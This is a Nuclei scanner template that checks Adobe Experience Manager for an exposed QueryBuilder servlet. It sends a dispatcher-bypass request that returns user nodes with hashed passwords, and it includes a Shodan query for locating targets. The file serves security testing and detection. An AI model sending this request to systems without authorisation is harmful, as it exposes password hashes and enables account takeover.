id: aem-hash-querybuilder

info:
  name: Query hashed password via QueryBuilder Servlet
  author: DhiyaneshDk
  severity: medium
  reference:
    - https://twitter.com/AEMSecurity/status/1372392101829349376
  metadata:
    max-request: 1
    shodan-query: http.component:"Adobe Experience Manager"
  tags: Adobe-Experience-Manager

http:
  - raw:
      - |
        GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"success":true'
          - 'rep:password'
        condition: and

# digest: 4b0a00483046022100ba9e4e7ef1ed32094d5f6dc266c88571cd6274e0ff5965996d3b49c8806bbcac022100fbd16313016104e93dc15147568fb6b14af5ecaa3b0d2661225487edb4c08342:922c64590222798bb761d5b6d8e72950
